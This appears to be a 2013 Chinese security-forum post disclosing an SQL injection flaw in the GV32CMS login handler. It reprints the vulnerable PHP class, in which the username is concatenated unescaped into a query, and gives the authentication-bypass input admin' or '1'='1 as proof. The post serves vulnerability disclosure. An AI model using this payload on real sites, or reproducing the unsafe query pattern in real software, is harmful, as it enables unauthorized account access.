中国网络渗透测试联盟
标题:
GV32CMS最新漏洞(暗月渗透测试团队原创)
[打印本页]
作者:
admin
时间:
2013-10-27 16:23
标题:
GV32CMS最新漏洞(暗月渗透测试团队原创)
0x01 简要描述:
" ~7 j2 F, z$ M7 ?- f( ? j
GV32-CMS免费开源企业建站系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业企业建站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为GV32.COM原创,有着完全的知识产权。凭借 GV32.COM的不断创新精神和认真的工作态度,GV32-CMS企业建站系统已成国内外同类软件中的最好用的企业建站系统。
R- X+ B9 T! W0 t
0x02 详细说明:
<?php
if (!defined('GV32_COM')) exit('GV32.COM No direct script access allowed');
class Login
{
function Login()
{
//echo 'Login';
}
function act( )
{
//缓存一天 //60 * 60 * 24 缓存时间 一天
$GLOBALS['Templ'] -> caching = true;
$GLOBALS['Templ'] -> cache_lifetime = 86400 ;
$GLOBALS['Templ'] -> assign('copyright',COPYRIGHT); //版权
$GLOBALS['Templ'] -> assign('actUrl',EMPLOYEE_WEBURL."/login.php?load=login&act=actlogin");
$GLOBALS['Templ'] -> display('login_tpl.html');
}
function actlogin( )
{
echo $use_nameval = $GLOBALS['Reque'] -> funpost("use_name");
$use_pwdval = $GLOBALS['Reque'] -> funpost("use_pwd");
$use_captchaval = $GLOBALS['Reque'] -> funpost("use_captcha");
$this -> logincount();
if($use_captchaval!=$_SESSION["Img"])
{
$GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_captchaerror']);
$GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
$GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
$GLOBALS['Templ'] -> display('suggestion_tpl.html');
}else{
$sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
//exit();
$adminInfo["emplyeeUser"] = $GLOBALS['MySql'] -> selectOne($sqlQuery);
if($adminInfo["emplyeeUser"]["use_id"])
{
$GLOBALS['WebSe'] -> SetSession( $adminInfo );
$nowtime = time();
$adminip = $GLOBALS['Helpe'] -> getip();
//登录成功更新用户信息
$sqlup = " UPDATE ".SQL_PREFIX."user set use_logcount = use_logcount +1 , use_loginip = '".$adminip."', use_logintime = ".$nowtime." WHERE use_name= '".$use_nameval."' and use_id = ".$adminInfo["emplyeeUser"]["use_id"]." LIMIT 1 " ;
$GLOBALS['MySql'] -> querySql($sqlup);
//登录成功!重置IP错误信息清0!
$updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = 0 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
$GLOBALS['MySql'] -> querySql( $updateip );
$GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_loginsusse']);
$GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
$GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL);
$GLOBALS['Templ'] -> display('suggestion_tpl.html');
//var_dump($_SESSION);
}else{
$GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_usererror']);
$GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
$GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
$GLOBALS['Templ'] -> display('suggestion_tpl.html');
/*
header("location:".EMPLOYEE_WEBURL."/login.php?load=login&act=act");
exit();
*/
}
}
}
function logincount()
{
$adminip = $GLOBALS['Helpe'] -> getip();
$now = time();
if( $adminip!='Unknown' and $adminip!='' )
{
//查询记录是否存在
$sqlip = " SELECT error_id , session_id , errorcount , start_time FROM ".SQL_PREFIX."loginerror WHERE ip_address = '".$adminip."' AND logtype = 'login' LIMIT 1 ";
$useripInfo = $GLOBALS['MySql'] -> selectOne($sqlip);
if($useripInfo["error_id"])
{
//超过一天。重置时间及数量
if( $useripInfo["start_time"] > ( $now + 86400 ) )
{
$updateip = "UPDATE `".SQL_PREFIX."loginerror` SET `session_id` = '".$_SESSION["session_id"]."' , start_time ='".$now."' ,errorcount = '1' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
$GLOBALS['MySql'] -> querySql($updateip);
}elseif( $useripInfo["errorcount"] >= 20 )
{
$updateip = "UPDATE `loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
$GLOBALS['MySql'] -> querySql( $updateip );
$GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_tomorrowerror']);
$GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
$GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
$GLOBALS['Templ'] -> display('suggestion_tpl.html');
exit();
}else{
if( $useripInfo["errorcount"] < 5 )
{
$updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
$GLOBALS['MySql'] -> querySql($updateip);
}elseif( $useripInfo["start_time"] > ( $now - 3600) )
{
$updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
$GLOBALS['MySql'] -> querySql($updateip);
$GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_counterror']);
$GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
$GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
$GLOBALS['Templ'] -> display('suggestion_tpl.html');
exit();
}else{
$updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 ,session_id = '".$_SESSION["session_id"]."' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
$GLOBALS['MySql'] -> querySql($updateip);
}
}
//时间未超过1小时,状态有效,数量是否超过5次
//未超过5次更新+1
}else{
$insertip ="INSERT INTO `".SQL_PREFIX."loginerror` (`session_id` , `errorcount` , `ip_address` , `start_time` , `logtype` ) VALUES ( '".$_SESSION["session_id"]."', '1', '$adminip', '$now', 'login')";
$GLOBALS['MySql'] -> querySql($insertip);
}
}else{
$GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_syserror']);
$GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
$GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
$GLOBALS['Templ'] -> display('suggestion_tpl.html');
exit();
}
}
}
$Login = new Login();
?>
5 F( k6 {. y. R& V6 b" T( m0 B# b e
4 l" J9 }7 U' @2 ^ B5 K5 K7 W8 b
复制代码
6 O( p& F$ n+ _
经典语句重现
$sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
/ J1 T1 J, U( T, \! i
! j+ y1 A5 Y( }- M! n: Q
复制代码
0 f8 e: n9 q* A- R1 u" S, Q
原本以为注释就完事了 后来发现被过滤l 再看funpost函数
+ E/ y: B& x! | W
4 A9 D, @0 s5 Q+ w8 z) X2 S
[attach]270[/attach]
8 F p) \4 X L7 `2 Z
2 J1 g5 F( K ?. B
0x03 漏洞证明:
& N/ O4 f. s5 |' O4 s) C0 M
登录用户处填写
admin' or '1'='1
+ I$ |& ^( G4 Q3 C5 j
/ [+ S. v. |/ z+ n: `8 t
[attach]273[/attach]
J# J- F! p& F/ E/ Q
- f+ i) n; \+ B
6 @, H, @1 a% u8 I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2